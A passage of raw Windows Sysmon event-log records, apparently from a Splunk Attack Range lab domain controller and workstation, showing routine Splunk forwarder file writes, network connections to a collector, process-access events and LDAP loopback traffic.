Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BF92919517161FE6E916145F1EA0473,SHA256=11822BE554C550B9EB13CC9158A9995962A54019BD20C689687E4ABEE1B1D79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:46.089{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F3B1AB0E6691A3260CE66422AFAC102,SHA256=96E32FD0E90B183A06BA29F503E4F9DFB79BCA5069674836BA563BA262D5FB4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082538Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:43.719{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50100-false10.0.1.12-8000- 23542300x800000000000000082540Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:47.853{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=049AFA57531B8057E724018B3A518DA1,SHA256=2F467428E1D819370CDD4AC48185257DD393128645D2EF5B8747B4AE9CBCDAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:47.090{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4913950541F1DA8BCA9B0819828DBAE,SHA256=80A5C9A377AFD68915C3D1BC0B46669B2846C09F790B20392947F1EB61F5F36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082541Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:48.853{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66A64A727BB4897A839D16CE394F8BEE,SHA256=A4D7E85A004EEDDF92407703F84FDB493E1228C91A3F6D4A1E4D38017D02A3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:48.090{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667B2BAE8E20C041DC7AD9274D574C0E,SHA256=C8B2667E4A4873CC8E4EED9E724039455135CC4C38CE9EEEA5BE60333E597318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082542Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:49.853{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B62A4D141ABDEB2CC8E98F5CFB62B2B,SHA256=662683773454E7333A0F4353A500C23F1C10E9CD3A71D4E2BE574C61E538726E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:49.106{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47AF273B188A031C03BA9E5175A6717C,SHA256=0649A8040080CD6DC92BA917CC01C0A0804E2C55565546B04AD3F6A915FC303F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082543Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:50.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3BE6FF7E9E951BB646D8016FD4F7B5,SHA256=211E6ACC2526BE5DF89957CF9A3A5E654D3971BF6525ABA2D58D92DA85EA8F3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:48.484{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51711-false10.0.1.12-8000- 23542300x8000000000000000104633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:50.122{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A20F9A6271687E6A8A4189D77273D88,SHA256=B54800D447444B6D730C4032E6C73BEE4FF7220EAC0850CAC778BDA57D426A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082545Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:51.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=112B0AE0F2C075084CDA6620F61CC5C8,SHA256=9361BCD513420987EAC70DD86FA9E04EA59BA5707CB357F7577B0B8CE303BDD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:51.137{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0200D77F9B781BAD3DD21128986D4FC,SHA256=0551D5333D393351706257C765BC86E2D63D18CE6E798D1D73B16904E28A6120,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082544Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:48.770{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50101-false10.0.1.12-8000- 23542300x800000000000000082546Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:52.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC119EBBE3E62CD32207B88DA6A14BE,SHA256=558727DAC02494DCF090DB965CA5DDB84A0AE1904D340BB6D2C6EAD9BC01CD7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:52.184{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=081A9176215453AD8BACF43D4EE74D6F,SHA256=6D71A5358526637CAFDBD5AF26E314915EC872E43DEA67CA99CD6B25E09E8B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082547Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:53.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9CBED18DDAF4D06D5936AACBE26228A,SHA256=5DA7D2EBCD0DF3D3C6BC927E3CFEE35C49053279D24A8FA9AF9C256517E6914E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:53.418{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E487F7CD78A111912647526EBC0804,SHA256=E0C78D84D9CDA74BEF731C0F882B8159B029DE23B01813B0CCA470EDFC31D6D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082548Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:54.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C6E5DB4C24FC784D6932B00E6EA93F,SHA256=0E064307A8553CD5F7FED93425AF7B20DE6C0399845D96FDBA65DE0D6AA26D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:54.418{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C8064C0DC44A9F026907F08BC591E9,SHA256=B94C848F327464ED3A97F43109F037FEE8DD2EFDAB9D3D516CB0B654A7AD8A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082549Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:55.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9763140FD324D6D85CB08EB688BA10A5,SHA256=76D208E3715DB8B869F767C0C08A3097BEC25B4EB5A19BF311B2B2FB3E334E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:54.468{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51712-false10.0.1.12-8000- 23542300x8000000000000000104639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:55.418{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5524AF18373CEB34EDFC1A3338A0F21,SHA256=98D1A2792795172783C73E84D3B137E1B1C2408652A4B503C5A28D77019B91C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082551Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:56.873{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08432F0007621AFAA7F3C0758630C12C,SHA256=D87FF39F127AB483AC3848695AE0DAA377E1847E26F9637DD0EC2F2D2719DA73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:56.922{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:56.422{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619F30B551B5269D7B21FAD288AAD1E1,SHA256=65FA2E0A903BCA5C96F83DD43C4D9CCE7F138A3E3CA0DC2F25A57FC7617498C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082550Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:54.672{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50102-false10.0.1.12-8000- 23542300x800000000000000082552Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:57.873{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F175FDD409452B529A4D95D13335BF2A,SHA256=7474A0452F89137C6D59DF0AAB1FB4BAEC6B18AF2BDD890BE8E9AAE370BA0E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:57.469{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4209F0222261F68C20F4D44E6E4848F8,SHA256=2E11D5AABC00342BEE5606756A7A5241FFF0151BC6438BC78A1C1D922C2BB559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082553Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.873{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=800DCB005FA164978DD337EF9FEDC6ED,SHA256=E9211E196E211F4F54203D7723617E2CB22DFA2B3DF4B5AA9BF634D5FA9428B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:57.144{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51713-false10.0.1.12-8089- 10341000x8000000000000000104652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CA-615A-F701-00000000FC01}6820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3CA-615A-F701-00000000FC01}6820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.594{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CA-615A-F701-00000000FC01}6820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.595{58E9C193-B3CA-615A-F701-00000000FC01}6820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.469{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C183C9A0D4E26792EB34A3206827CE58,SHA256=B277E070776ADA6BC51839DCADDAB5ED4F339375355C2E2A67E061FA12A44FAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082567Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:59.873{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1EE1D26C565513AC77F4AA78444A74C,SHA256=73E12E668057E56DBDD3F21C2E9A4793071010DFBC2E56A9711ECE390D8F8DFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.735{58E9C193-B3CB-615A-F801-00000000FC01}66725044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.300{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51714-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:58.300{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51714-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000104664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CB-615A-F801-00000000FC01}6672C:\Program 